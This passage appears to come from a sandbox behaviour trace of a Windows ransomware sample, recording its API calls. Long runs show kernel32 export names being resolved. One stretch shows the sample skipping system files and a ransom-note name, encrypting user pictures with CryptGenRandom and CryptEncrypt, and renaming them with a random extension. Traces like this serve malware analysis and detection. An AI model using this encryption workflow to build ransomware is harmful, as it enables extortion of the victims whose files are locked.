(lpString="CREATESYMBOLICLINKW") returned 19 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.449] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.449] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.449] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.449] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.449] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.449] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.449] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.449] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.449] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.449] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.449] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.449] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.449] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.449] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.449] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.449] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.450] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.450] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.450] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.450] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.450] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.450] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.450] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.450] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.450] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.450] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.450] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.450] lstrlenA (lpString="DELETEATOM") returned 10 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.450] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.450] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.450] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.450] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.450] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.451] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.451] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.451] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.451] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.451] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.451] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.451] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.451] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.451] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.451] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.451] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.451] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.451] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.451] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.451] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.451] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.451] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.455] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.455] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.455] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.455] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.455] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.455] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.455] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.455] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.455] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.455] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.455] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.455] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.455] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.455] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.455] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.455] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.455] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.455] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.456] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.456] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp") returned 64 [0086.456] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp.GqVeHV") returned 71 [0086.456] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\m7hzt_fgquoni6h.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp.GqVeHV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\m7hzt_fgquoni6h.bmp.gqvehv"), dwFlags=0x0) returned 1 [0086.457] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.457] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.457] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.457] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3beb2120, ftCreationTime.dwHighDateTime=0x1d4d47e, ftLastAccessTime.dwLowDateTime=0xafe51030, ftLastAccessTime.dwHighDateTime=0x1d4c79b, ftLastWriteTime.dwLowDateTime=0xafe51030, ftLastWriteTime.dwHighDateTime=0x1d4c79b, nFileSizeHigh=0x0, nFileSizeLow=0xfafc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MiKHLksvTxyN7KMU5.png", cAlternateFileName="MIKHLK~1.PNG")) returned 1 [0086.457] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="DECRYPT-FILES.txt") returned 1 [0086.458] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="autorun.inf") returned 1 [0086.458] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="boot.ini") returned 1 [0086.458] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="desktop.ini") returned 1 [0086.458] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="ntuser.dat") returned -1 [0086.458] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="iconcache.db") returned 1 [0086.458] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="bootsect.bak") returned 1 [0086.458] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="ntuser.dat.log") returned -1 [0086.458] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="thumbs.db") returned -1 [0086.458] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png", lpString2="Bootfont.bin") returned 1 [0086.458] lstrlenW (lpString="MiKHLksvTxyN7KMU5.png") returned 21 [0086.458] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0086.458] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0086.458] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0086.458] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0086.458] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.458] lstrlenW (lpString="MiKHLksvTxyN7KMU5.png") returned 21 [0086.458] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.458] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="MiKHLksvTxyN7KMU5.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png" [0086.458] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\mikhlksvtxyn7kmu5.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.458] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=64252) returned 1 [0086.459] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.459] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.459] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.459] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.459] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.459] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.459] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.461] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.461] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.462] CloseHandle (hObject=0x42c) returned 1 [0086.462] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.462] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.462] CloseHandle (hObject=0x0) returned 0 [0086.463] CloseHandle (hObject=0x428) returned 1 [0086.463] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.463] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.463] GetTickCount () returned 0x114e10c [0086.463] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.463] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.463] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.464] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.464] lstrlenA (lpString="kernel32.dll") returned 12 [0086.464] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.464] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.464] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.464] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.464] lstrlenA (lpString="ADDATOMA") returned 8 [0086.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.464] lstrlenA (lpString="ADDATOMW") returned 8 [0086.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.464] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.464] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.465] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.465] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.465] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.465] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.465] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.465] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.465] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.465] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.465] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.465] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.465] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.465] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.465] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: 